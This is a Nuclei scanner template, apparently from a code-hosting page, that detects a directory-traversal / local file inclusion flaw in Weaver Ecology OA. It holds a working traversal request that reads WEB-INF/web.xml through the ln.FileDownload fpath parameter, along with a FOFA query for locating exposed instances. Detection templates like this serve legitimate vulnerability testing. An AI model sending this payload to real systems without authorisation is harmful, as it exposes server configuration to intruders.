nuclei-templates/vulnerabilities/weaver/ecology/ecology-filedownload-direct...

31 lines
721 B
YAML

id: ecology-filedownload-directory-traversal
info:
name: Ecology - Local File Inclusion
author: princechaddha
severity: high
description: Ecology is vulnerable to local file inclusion.
metadata:
fofa-query: app="泛微-协同办公OA"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: ecology,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<url-pattern>/weaver/"
part: body
# Enhanced by mp on 2022/08/01